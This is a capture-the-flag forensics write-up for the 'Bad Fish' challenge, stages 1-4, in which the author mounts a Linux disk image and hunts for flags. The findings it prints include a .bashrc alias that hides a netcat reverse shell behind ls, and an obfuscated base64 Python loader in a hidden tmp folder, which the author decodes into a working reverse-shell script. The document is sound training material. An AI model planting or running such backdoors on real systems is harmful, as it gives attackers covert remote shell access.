Bad Fish

Stage 001

BRIEFING

Difficulty: Introductory

Uh Oh it seems a few bad fish got into the fish tank!

Can you find them all?

Challenge File: badfish.zip

Zip Password: bAdFi5h

DISCLAIMER: Flag will start with the number of the challenge it belongs to.

EXAMPLE: 1_This_Is_a_Fake_Flag

Work/Solution

Find the offset of the partition.

fdisk -l ./badfish.img
Disk ./badfish.img: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xae84473a

Device         Boot Start     End Sectors  Size Id Type
./badfish.img1 *     2048 2097151 2095104 1023M 83 Linux

Block size of 512 bytes and start block is 2048. The offset is 512 * 2048 = 1048576.

mount -o loop,offset=1048576 badfish.img /mnt/tmp

Ok, this is a Linux disk image.

la /mnt/tmp
total 76K
lrwxrwxrwx  1 root root    7 Oct  3  2022 bin -> usr/bin
drwxr-xr-x  2 root root 4.0K Oct 23  2022 boot
drwxr-xr-x  4 root root 4.0K Oct 23  2022 dev
drwxr-xr-x 47 root root 4.0K Oct 23  2022 etc
drwxr-xr-x  3 root root 4.0K Oct 23  2022 home
lrwxrwxrwx  1 root root   30 Oct 22  2022 initrd.img -> boot/initrd.img-5.19.0-2-amd64
lrwxrwxrwx  1 root root   30 Oct 22  2022 initrd.img.old -> boot/initrd.img-5.19.0-2-amd64
lrwxrwxrwx  1 root root    7 Oct  3  2022 lib -> usr/lib
lrwxrwxrwx  1 root root    9 Oct  3  2022 lib32 -> usr/lib32
lrwxrwxrwx  1 root root    9 Oct  3  2022 lib64 -> usr/lib64
lrwxrwxrwx  1 root root   10 Oct  3  2022 libx32 -> usr/libx32
drwx------  2 root root  16K Oct 23  2022 lost+found
drwxr-xr-x  2 root root 4.0K Oct  3  2022 media
drwxr-xr-x  2 root root 4.0K Oct  3  2022 mnt
drwxr-xr-x  2 root root 4.0K Oct  3  2022 opt
drwxr-xr-x  2 root root 4.0K Jan 19  2022 proc
drwx------  2 root root 4.0K Oct  3  2022 root
drwxr-xr-x  8 root root 4.0K Oct 22  2022 run
lrwxrwxrwx  1 root root    8 Oct  3  2022 sbin -> usr/sbin
drwxr-xr-x  2 root root 4.0K Oct  3  2022 srv
drwxr-xr-x  2 root root 4.0K Jan 19  2022 sys
drwxrwxrwt  3 root root 4.0K Oct 23  2022 tmp
drwxr-xr-x 14 root root 4.0K Oct  3  2022 usr
drwxr-xr-x 11 root root 4.0K Oct  3  2022 var
lrwxrwxrwx  1 root root   27 Oct 22  2022 vmlinuz -> boot/vmlinuz-5.19.0-2-amd64
lrwxrwxrwx  1 root root   27 Oct 22  2022 vmlinuz.old -> boot/vmlinuz-5.19.0-2-amd64

Found this flag in etc/apt/sources.list.

grep -r "1_" /mnt/tmp/etc
/mnt/tmp/etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs:# /etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs is only used
/mnt/tmp/etc/exim4/conf.d/acl/30_exim4-config_check_rcpt:  # defined in main/01_exim4-config_listmacrosdefs or override them from a
/mnt/tmp/etc/exim4/conf.d/acl/30_exim4-config_check_rcpt:  # main/01_exim4-config_listmacrosdefs:
/mnt/tmp/etc/exim4/conf.d/rewrite/31_exim4-config_rewriting:### rewrite/31_exim4-config_rewriting
/mnt/tmp/etc/exim4/exim4.conf.template:### main/01_exim4-config_listmacrosdefs
/mnt/tmp/etc/exim4/exim4.conf.template:# /etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs is only used
/mnt/tmp/etc/exim4/exim4.conf.template:### end main/01_exim4-config_listmacrosdefs
/mnt/tmp/etc/exim4/exim4.conf.template:  # defined in main/01_exim4-config_listmacrosdefs or override them from a
/mnt/tmp/etc/exim4/exim4.conf.template:  # main/01_exim4-config_listmacrosdefs:
/mnt/tmp/etc/exim4/exim4.conf.template:### rewrite/31_exim4-config_rewriting
/mnt/tmp/etc/exim4/exim4.conf.template:### rewrite/31_exim4-config_rewriting
/mnt/tmp/etc/exim4/exim4.conf.template:### end rewrite/31_exim4-config_rewriting
grep: /mnt/tmp/etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg: binary file matches
/mnt/tmp/etc/apt/sources.list:deb 'http://1_5w1m_uP_dA_r3P0/ stretch main contrib non-free
/mnt/tmp/etc/ca-certificates.conf:mozilla/QuoVadis_Root_CA_1_G3.crt

Stage 002

BRIEFING

Difficulty: Introductory

Felines really do love fish.

DISCLAIMER: Flag will start with the number of the challenge it belongs to.

EXAMPLE: 2_This_Is_a_Fake_Flag

Work/Solution

This was my second flag I discovered. While exploring the mounted file system, I looked at the .bashrc file in /home/nemo, where I discovered the flag in an alias.

la home
total 4.0K
drwxr-xr-x 2 8877 8877 4.0K Oct 23  2022 nemo

la home/nemo
total 12K
-rw-r--r-- 1 8877 8877  220 Aug 25  2022 .bash_logout
-rw-r--r-- 1 8877 8877 3.5K Oct 23  2022 .bashrc
-rw-r--r-- 1 8877 8877  807 Aug 25  2022 .profile

tail -n5 home/nemo/.bashrc
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi
alias ls='ls;nc 2_sM31ly_CaT 4454 -e /bin/bash'

Stage 003

BRIEFING

Difficulty: Introductory

Are you concerned how pollution is impacting our oceans?

DISCLAIMER: Flag will start with the number of the challenge it belongs to.

EXAMPLE: 3_This_Is_a_Fake_Flag

Work/Solution

I found this flag while exploring the mounted file system as well. It was in plain sight.

la bin/ | head -n 5
total 45M
-rwsr-xr-x 1 root root     31K Oct 22  2022 3_5tr1nGs_r_BaD_4_f15H
lrwxrwxrwx 1 root root      22 Apr 14  2022 Mail -> /etc/alternatives/Mail
-rwxr-xr-x 1 root root     67K Sep 20  2022 [
-rwxr-xr-x 1 root root     31K Oct 16  2022 addpart

Stage 004

BRIEFING

Difficulty: Easy

SSShhhhhhh! Don't tell anyone I got here.

DISCLAIMER: Flag will start with the number of the challenge it belongs to.

EXAMPLE: 4_This_Is_a_Fake_Flag

Work/Solution

I found this flag while attempting to solve Stage 001. After I mounted the .img file as described in Stage 001 I started poking around the file system. The first place I looked was in /tmp, where I discovered a Python file.

cd /mnt/tmp

la tmp                                          
total 4.0K                         
drwxr-xr-x 2 root root 4.0K Oct 23  2022 .d

la tmp/.d
total 4.0K                                   
-rwxr-xr-x 1 root root 611 Oct 23  2022 daily.py

The contents of daily.py:

import base64

test = ""
for i in ['YmFzZTY0LmI2NGRlY29kZSgnQ21aeWI=', 'MjBnYjNNZ2FXMXdiM0owSUdSMWNESUs=', 'Wm5KdmJTQnpkV0p3Y205alpYTnpJR2w=', 'dGNHOXlkQ0J5ZFc0S2FXMXdiM0owSUg=', 'TnZZMnRsZEFwelBYTnZZMnRsZEM1emI=', 'Mk5yWlhRb2MyOWphMlYwTGtGR1gwbE8=', 'UlZRc2MyOWphMlYwTGxOUFEwdGZVMVI=', 'U1JVRk5LUXB6TG1OdmJtNWxZM1FvS0M=', 'STBYelZ1TTJGcmVWODFia1ZoYTFraUw=', 'RGc0T0RncEtRcGtkWEF5S0hNdVptbHM=', 'Wlc1dktDa3NNQ2tLWkhWd01paHpMbVo=', 'cGJHVnVieWdwTERFcENtUjFjRElvY3k=', 'NW1hV3hsYm04b0tTd3lLUXB5ZFc0b1c=', 'eUl2WW1sdUwySmhjMmdpTENJdGFTSmQ=', 'S1FvPScp']:
    test = test + base64.b64decode(i).decode()
eval(test)

I added a print(test) statement to the end of the file:

import base64

test = ""
for i in ['YmFzZTY0LmI2NGRlY29kZSgnQ21aeWI=', 'MjBnYjNNZ2FXMXdiM0owSUdSMWNESUs=', 'Wm5KdmJTQnpkV0p3Y205alpYTnpJR2w=', 'dGNHOXlkQ0J5ZFc0S2FXMXdiM0owSUg=', 'TnZZMnRsZEFwelBYTnZZMnRsZEM1emI=', 'Mk5yWlhRb2MyOWphMlYwTGtGR1gwbE8=', 'UlZRc2MyOWphMlYwTGxOUFEwdGZVMVI=', 'U1JVRk5LUXB6TG1OdmJtNWxZM1FvS0M=', 'STBYelZ1TTJGcmVWODFia1ZoYTFraUw=', 'RGc0T0RncEtRcGtkWEF5S0hNdVptbHM=', 'Wlc1dktDa3NNQ2tLWkhWd01paHpMbVo=', 'cGJHVnVieWdwTERFcENtUjFjRElvY3k=', 'NW1hV3hsYm04b0tTd3lLUXB5ZFc0b1c=', 'eUl2WW1sdUwySmhjMmdpTENJdGFTSmQ=', 'S1FvPScp']:
    test = test + base64.b64decode(i).decode()
eval(test)
print(test)

Running the python file:

python tmp/.d/daily.py
base64.b64decode('CmZyb20gb3MgaW1wb3J0IGR1cDIKZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBydW4KaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCI0XzVuM2FreV81bkVha1kiLDg4ODgpKQpkdXAyKHMuZmlsZW5vKC
ksMCkKZHVwMihzLmZpbGVubygpLDEpCmR1cDIocy5maWxlbm8oKSwyKQpydW4oWyIvYmluL2Jhc2giLCItaSJdKQo=')

Decoding the output string:

echo 'CmZyb20gb3MgaW1wb3J0IGR1cDIKZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBydW4KaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCI0XzVuM2FreV81bkVha1kiLDg4ODgpKQpkdXAyKHMuZmlsZW5vKCksMCkKZHVwMihzLmZpbGVubygpLDEpCmR1cDIocy5maWxlbm8oKSwyKQpydW4oWyIvYmluL2Jhc2giLCItaSJdKQo=' | base64 -d

from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("4_5n3aky_5nEakY",8888))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])